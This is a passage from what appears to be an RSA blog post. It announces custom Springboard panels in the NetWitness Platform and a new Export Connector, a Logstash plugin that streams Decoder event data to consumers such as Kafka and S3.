Springboard administrators can also create custom panels, up to a total of ten, of a 6th type for aggregating "Events" based on any existing saved query profile used in the Investigate module.  This only requires the core RSA NetWitness platform, with data being sourced from the underlying NetWitness Database (NWDB).  This enables organizations to add their own starting places for analysts that go beyond the defaults, and to customize the landing experience to adjust for deployed RSA NetWitness Platform components:

 

Example of custom Springboard Panel creation using Event data

 

For more details on management of the Springboard, please see: NW: Managing the Springboard 

 

And as always, if you have any feedback or ideas on how we can improve Springboard or anything else in the product, please submit your ideas via the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform  

RSA is pleased to announce the availability of the NetWitness Export Connector, which enables customers to export NetWitness Platform events and routes the data where you want, all in continuous, streaming fashion. Providing the flexibility to satisfy a variety of use cases. 

 

This plugin is installed on Logstash and integrates with NetWitness Platform Decoders and Log Decoders. This plugin aggregates meta data and raw logs from the Decoder or Log Decoder and converts it to Logstash JSON object, which can easily integrate with numerous consumers such as Kafka, AWS S3, TCP, Elastic and others.

 

Work Flow of NetWitness Export Connector 

 

  • The input plugin collects meta data and raw logs from the Log Decoder, and the meta data from the Decoder. The data is then forwarded to the Filter plugin.
  • The Filter plugin adds, removes, or modifies the received data and forwards it to the Output plugin.
  • The Output plugin sends the processed event data to the consumer destinations. You can use the standard Logstash output plugins to forward the data.

 

Check it out and let me know what you think!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

 

Download and Documentation

https://community.rsa.com/docs/DOC-114086

Filter Blog

By date: By tag: